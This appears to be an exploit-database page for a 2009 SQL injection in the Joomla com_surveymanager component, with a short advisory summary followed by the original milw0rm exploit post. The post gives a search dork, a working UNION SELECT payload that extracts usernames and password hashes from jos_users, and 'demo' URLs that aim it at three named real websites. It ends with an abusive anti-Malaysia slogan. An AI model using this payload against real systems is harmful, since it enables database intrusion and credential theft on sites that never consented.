header-logo
Suggest Exploit
vendor:
Joomla com_surveymanager
by:
kaMtiEz
7.5
CVSS
HIGH
SQL injection
89
CWE
Product Name: Joomla com_surveymanager
Affected Version From: 1.5.2000
Affected Version To: 1.5.2000
Patch Exists: YES
Related CWE: N/A
CPE: a:focusdev:joomla_com_surveymanager
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla com_surveymanager SQL injection vulnerability – (stype)

A SQL injection vulnerability exists in Joomla com_surveymanager component. An attacker can exploit this vulnerability to gain access to the database and execute arbitrary SQL commands. The vulnerability is due to the 'stype' parameter in the 'editsurvey' task of the 'com_surveymanager' component not properly sanitizing user-supplied input. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious SQL statements to the vulnerable application. Successful exploitation of this vulnerability can result in unauthorized access to the database and execution of arbitrary SQL commands.

Mitigation:

Upgrade to the latest version of Joomla com_surveymanager component.
Source

Exploit-DB raw data:

#############################################################################################################
## Joomla com_surveymanager SQL injection vulnerability - (stype)				           ##
## Author : kaMtiEz (kamzcrew@yahoo.com)								   ##
## Homepage : http://www.indonesiancoder.com    	     					    	   ##
## Date : September 19, 2009 									   	   ##
#############################################################################################################
#############################################################################################################
# /~~\__/~~\_/~~~~\_/~~\_______/~~\__________________/~~~~~\__                                              #
# /~~\_/~~\___/~~\__/~~\_______/~~\_________________/~~\_/~~\_                                              #
# /~~~~~\_____/~~\__/~~\_______/~~\_______/~~~~~~~\__/~~~~~\__                                              #  
# /~~\_/~~\___/~~\__/~~\_______/~~\____________________/~~\___                                              #
# /~~\__/~~\_/~~~~\_/~~~~~~~~\_/~~~~~~~~\_____________/~~\____                                              #
#____________________________________________________________ -=- KILL-9 CREW -=- INDONESIANCODER -=-       #
#                                                                                                           #
#############################################################################################################

[ Software Information ]

[+] Vendor : http://www.focusdev.co.uk/
[+] Download : http://www.focusdev.co.uk/products/8-joomla-products/17-survey-manager
[+] version : 1.5.0 
[+] Vulnerability : SQL injection
[+] Dork : inurl:"com_surveymanager"

#############################################################################################################

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_surveymanager&task=editsurvey&stype=[SQL]

[ Exploit ]

-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

[ Demo ]

http://portal.psz.utm.my/div/btk/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

http://www.acs-stny.com/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

http://ridsrealty.com/index.php?option=com_surveymanager&task=editsurvey&stype=-2+union+select+1,concat_ws(0x3a,username,password),3,4,5,6+from+jos_users--

#############################################################################################################

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW
[+] tukulesto,M3NW5,arianom,tiw0L,Pathloader,abah_benu,VycOd,och3_an3h
[+] Contrex,onthel,yasea,bugs,olivia,Jovan,Aar,Ardy,invent,Ronz
[+] Coracore,black666girl,NepT,ichal,tengik and YOU!!

[ NOTE ] 

[+] Selamat Hari Raya Idul Fitri 1930 H
[+] Minal aidzin Wal faidzin, Mohon Maaf Lahir Batin Maap Kalo ada salah2 kata mohon dimaafkan
[+] terima kasih banget buat tukulesto dan arianom yang setiap malam menemani saya waktu exploit .. wkwkwkw

[ QUOTE ]

[+] Soekarno : Dengan ini saya menyatakan "GANYANG MALAYSIA"
[+] FUCK MALAYSIA !!!

# milw0rm.com [2009-09-21]